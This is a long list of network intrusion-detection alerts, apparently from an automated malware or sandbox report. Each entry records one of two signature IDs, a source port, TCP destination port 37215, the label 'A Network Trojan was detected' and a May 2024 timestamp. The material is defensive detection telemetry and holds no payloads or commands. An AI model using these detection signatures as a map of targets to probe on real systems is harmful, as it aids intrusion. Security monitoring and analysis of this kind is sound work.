            SID:2829579
            Source Port:39502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310463
            SID:2829579
            Source Port:43170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334333
            SID:2835222
            Source Port:39148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.901354
            SID:2829579
            Source Port:57572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850313
            SID:2835222
            Source Port:48900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.520816
            SID:2829579
            Source Port:48246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.782042
            SID:2835222
            Source Port:33014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.312330
            SID:2829579
            Source Port:60600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733366
            SID:2835222
            Source Port:60862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943719
            SID:2829579
            Source Port:55328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994914
            SID:2829579
            Source Port:42260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020251
            SID:2835222
            Source Port:37646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.451901
            SID:2835222
            Source Port:57452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714602
            SID:2829579
            Source Port:51874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018433
            SID:2835222
            Source Port:33804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278040
            SID:2829579
            Source Port:47812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872620
            SID:2829579
            Source Port:54084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.865411
            SID:2835222
            Source Port:36086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.947426
            SID:2835222
            Source Port:38262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291226
            SID:2829579
            Source Port:51558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445145
            SID:2835222
            Source Port:39308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.879420
            SID:2829579
            Source Port:40074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832564
            SID:2829579
            Source Port:57144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922504
            SID:2835222
            Source Port:60904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826066
            SID:2835222
            Source Port:44024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930981
            SID:2835222
            Source Port:38392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290487
            SID:2829579
            Source Port:39206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058398
            SID:2829579
            Source Port:46702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444751
            SID:2829579
            Source Port:57104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.835958
            SID:2829579
            Source Port:46374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926827
            SID:2829579
            Source Port:38516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.766537
            SID:2835222
            Source Port:37608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.556391
            SID:2829579
            Source Port:32900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557415
            SID:2829579
            Source Port:48036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.862969
            SID:2829579
            Source Port:41672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832736
            SID:2829579
            Source Port:54150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.915040
            SID:2829579
            Source Port:33148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470849
            SID:2829579
            Source Port:59806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508100
            SID:2835222
            Source Port:41088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994798
            SID:2829579
            Source Port:46948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737881
            SID:2829579
            Source Port:48164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919613
            SID:2835222
            Source Port:46828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575976
            SID:2829579
            Source Port:38794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031310
            SID:2829579
            Source Port:56810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064334
            SID:2829579
            Source Port:49632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920226
            SID:2829579
            Source Port:43446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.342661
            SID:2835222
            Source Port:43552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994079
            SID:2835222
            Source Port:42182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064525
            SID:2829579
            Source Port:60778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.656187
            SID:2835222
            Source Port:52810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770630
            SID:2829579
            Source Port:58108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371232
            SID:2835222
            Source Port:45500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775924
            SID:2829579
            Source Port:41930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.307249
            SID:2829579
            Source Port:53016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.857907
            SID:2835222
            Source Port:56186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.759950
            SID:2835222
            Source Port:49600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966765
            SID:2835222
            Source Port:54416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.433273
            SID:2829579
            Source Port:45364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868475
            SID:2829579
            Source Port:35790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956929
            SID:2835222
            Source Port:57672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291192
            SID:2829579
            Source Port:56078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.048132
            SID:2835222
            Source Port:36350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437166
            SID:2829579
            Source Port:45494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064780
            SID:2829579
            Source Port:55532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777287
            SID:2835222
            Source Port:45996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.295787
            SID:2829579
            Source Port:38876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864897
            SID:2829579
            Source Port:54254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847289
            SID:2835222
            Source Port:43522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.957209
            SID:2829579
            Source Port:46696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.680144
            SID:2835222
            Source Port:35256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968209
            SID:2829579
            Source Port:55302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.534821
            SID:2835222
            Source Port:34482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542478
            SID:2835222
            Source Port:34494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862020
            SID:2835222
            Source Port:37676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.873090
            SID:2829579
            Source Port:51690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809530
            SID:2835222
            Source Port:33148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900994
            SID:2829579
            Source Port:58728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.051787
            SID:2829579
            Source Port:49546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.468436
            SID:2835222
            Source Port:41348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.807962
            SID:2835222
            Source Port:60760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444886
            SID:2829579
            Source Port:54660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757846
            SID:2835222
            Source Port:49640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.784052
            SID:2829579
            Source Port:33384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070737
            SID:2835222
            Source Port:44066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827574
            SID:2835222
            Source Port:44072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343015
            SID:2835222
            Source Port:48662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068289
            SID:2829579
            Source Port:47206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654814
            SID:2835222
            Source Port:48964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313529
            SID:2829579
            Source Port:52734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851140
            SID:2835222
            Source Port:56914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773779
            SID:2835222
            Source Port:38224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048753
            SID:2829579
            Source Port:54584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.680037
            SID:2829579
            Source Port:60280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376763
            SID:2835222
            Source Port:46464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057806
            SID:2835222
            Source Port:43806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.783732
            SID:2829579
            Source Port:59918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.774730
            SID:2835222
            Source Port:59322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.042586
            SID:2835222
            Source Port:33876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298498
            SID:2835222
            Source Port:50528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.626710
            SID:2829579
            Source Port:49580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880042
            SID:2835222
            Source Port:55410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.738466
            SID:2829579
            Source Port:37408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989230
            SID:2829579
            Source Port:41072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969903
            SID:2829579
            Source Port:59586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033147
            SID:2835222
            Source Port:51204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.308894
            SID:2835222
            Source Port:52708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899884
            SID:2829579
            Source Port:37050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.558080
            SID:2835222
            Source Port:45932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506250
            SID:2829579
            Source Port:39834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665753
            SID:2829579
            Source Port:50434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.767050
            SID:2835222
            Source Port:58466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869498
            SID:2829579
            Source Port:40268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919615
            SID:2829579
            Source Port:36448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875014
            SID:2835222
            Source Port:56128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525755
            SID:2829579
            Source Port:50252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931605
            SID:2829579
            Source Port:32970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936998
            SID:2835222
            Source Port:56728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.042632
            SID:2829579
            Source Port:43436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.473914
            SID:2829579
            Source Port:57918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525875
            SID:2835222
            Source Port:40440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.342410
            SID:2829579
            Source Port:58460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039389
            SID:2829579
            Source Port:36604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615224
            SID:2829579
            Source Port:56498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834311
            SID:2835222
            Source Port:42198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.387548
            SID:2829579
            Source Port:53390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.070038
            SID:2829579
            Source Port:37658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533445
            SID:2835222
            Source Port:59362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969586
            SID:2835222
            Source Port:38192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000844
            SID:2829579
            Source Port:54144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.611047
            SID:2835222
            Source Port:33334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.835884
            SID:2829579
            Source Port:53816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.444093
            SID:2829579
            Source Port:36948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559428
            SID:2835222
            Source Port:39860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854100
            SID:2829579
            Source Port:54698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777688
            SID:2835222
            Source Port:38532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742552
            SID:2835222
            Source Port:58548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026553
            SID:2829579
            Source Port:37568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935289
            SID:2835222
            Source Port:39958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723868
            SID:2829579
            Source Port:45974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757496
            SID:2835222
            Source Port:47884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663848
            SID:2835222
            Source Port:49390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.685463
            SID:2835222
            Source Port:57684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.909883
            SID:2835222
            Source Port:42718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790323
            SID:2829579
            Source Port:40702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568468
            SID:2835222
            Source Port:34756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.063921
            SID:2835222
            Source Port:36622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059766
            SID:2829579
            Source Port:32890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961140
            SID:2835222
            Source Port:46506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905621
            SID:2829579
            Source Port:36372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931071
            SID:2835222
            Source Port:50970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333705
            SID:2829579
            Source Port:49934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343674
            SID:2829579
            Source Port:36296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.070605
            SID:2829579
            Source Port:47924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.492839
            SID:2829579
            Source Port:56956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.517590
            SID:2835222
            Source Port:57640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.464702
            SID:2829579
            Source Port:37560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.846979
            SID:2835222
            Source Port:48078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450956
            SID:2829579
            Source Port:55878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050784
            SID:2835222
            Source Port:48414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.128570
            SID:2835222
            Source Port:41960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067180
            SID:2829579
            Source Port:34422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.859628
            SID:2835222
            Source Port:46784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222018
            SID:2835222
            Source Port:42104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336305
            SID:2829579
            Source Port:41896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.824425
            SID:2829579
            Source Port:44494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899520
            SID:2835222
            Source Port:53684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777643
            SID:2835222
            Source Port:54422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809194
            SID:2829579
            Source Port:46942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.855597
            SID:2829579
            Source Port:44908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943694
            SID:2829579
            Source Port:60698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.017440
            SID:2829579
            Source Port:37666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789477
            SID:2829579
            Source Port:49566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945858
            SID:2835222
            Source Port:60694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436614
            SID:2829579
            Source Port:48872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.889016
            SID:2835222
            Source Port:47508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909933
            SID:2829579
            Source Port:57260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717543
            SID:2835222
            Source Port:47318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.949742
            SID:2829579
            Source Port:43562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956350
            SID:2829579
            Source Port:49196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.727649
            SID:2829579
            Source Port:46492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860490
            SID:2829579
            Source Port:48642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853456
            SID:2829579
            Source Port:34016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966882
            SID:2829579
            Source Port:45674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.835688
            SID:2829579
            Source Port:47314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.062213
            SID:2835222
            Source Port:55666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.740262
            SID:2835222
            Source Port:40002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298690
            SID:2829579
            Source Port:47838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919465
            SID:2829579
            Source Port:52124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.110243
            SID:2829579
            Source Port:52888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.865882
            SID:2835222
            Source Port:50536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.909231
            SID:2835222
            Source Port:44080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.021134
            SID:2829579
            Source Port:46606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676130
            SID:2835222
            Source Port:59204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931506
            SID:2835222
            Source Port:44592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296360
            SID:2835222
            Source Port:36000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.462350
            SID:2835222
            Source Port:38584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069711
            SID:2835222
            Source Port:51620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222058
            SID:2829579
            Source Port:52302
            Destination Port:37215
